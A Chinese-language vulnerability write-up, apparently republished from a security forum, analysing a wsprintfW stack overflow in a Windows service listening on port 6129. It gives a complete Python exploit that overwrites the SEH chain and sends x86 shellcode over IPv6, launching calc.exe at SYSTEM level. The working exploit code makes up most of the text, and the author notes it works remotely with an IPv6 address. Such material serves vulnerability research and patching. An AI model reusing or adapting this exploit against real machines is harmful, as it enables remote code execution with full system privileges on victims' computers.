Author:SaFeBuG@i春秋

漏洞相关链接:http://www.freebuf.com/articles/terminal/102204.html

几个重要参数分布图:

D380处为input_buf,即是所发的shellcode包,大小为0x430 F920处为dst_buf,大小0x208 FB28处为format_str,大小为0x92

关键函数wsprintfW最大拷贝值为:0x400。由于该函数为unicode型,故每次拷贝两个字节,循环拷贝0x400次,故总共拷贝0x800 byte。从F920处开始,向下拷贝0x800个字节,导致栈空间全部被覆盖,触发了page fault异常。于是我们可以借此漏洞刻意覆盖SEH首链地址,用pop pop retn 覆盖第一个异常处理函数地址,用eb 06 90 90 覆盖第一个异常处理链表地址,接着就是用我们的布置好的call xxxx 覆盖后面部分。

如下图:

该漏洞只能在本地测试,远程测试的话,需要使用IPv6的ip地址才能成功。

IDA代码段如下;

该函数必须返回非零,下一步才能到达漏洞点。

测试环境:

Windows 7 x86 给出本地测试EXP代码: local_exp.py

import socket
import sys
import os
import time
import struct
import binascii
import random
  
# windows/exec - 220 bytes
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe
  
MsgBox = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
  
#pading = "A"*(0x20b+0x9) + "B"*(0x225-0x9)
#pading = "A"*(0x20b+0x9) + sc
attack = "\x90"*0x10 + MsgBox + "A"*(0x214 - 0x10 - len(MsgBox)) + "B"*(0x162) + "\xeb\x06\x90\x90"  + "\x6d\x14\x40\x00" + "\xe8\x37\xd4\xfe\xff" + "D"*(0xb6-0x4-0x5)
port = 6129
  
#if len (sys.argv) == 2:
# (progname, host ) = sys.argv
#else:
# print len (sys.argv)
# print 'Usage: {0} host'.format (sys.argv[0])
# exit (1)
host = '0:0:0:0:0:0:0:1'
csock = socket.socket( socket.AF_INET6, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
  
type = 444.0
buf = struct.pack("I", 4400 ) #Init Version
buf += "\xcc"*4
buf += struct.pack("d", type) #Minor Version
buf += struct.pack("d", type) #Minor Version
buf += (40 - len(buf)) * "C"#csock.send(buf)
csock.send(buf)
print binascii.hexlify(csock.recv(0x4000)) #necessary reads
  
  
buf = struct.pack("I", 0x9c44) #msg type
#buf += pading #payload
buf += attack
#buf += ("%" + "\x00" + "c" + "\x00")
csock.send(buf)
  
  
print binascii.hexlify(csock.recv(0x4000))
  
csock.close()

SYSTEM级别的calc。

原文地址:http://bbs.ichunqiu.com/thread-13555-1-1.html?from=seebug


Paper 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:http://paper.seebug.org/82/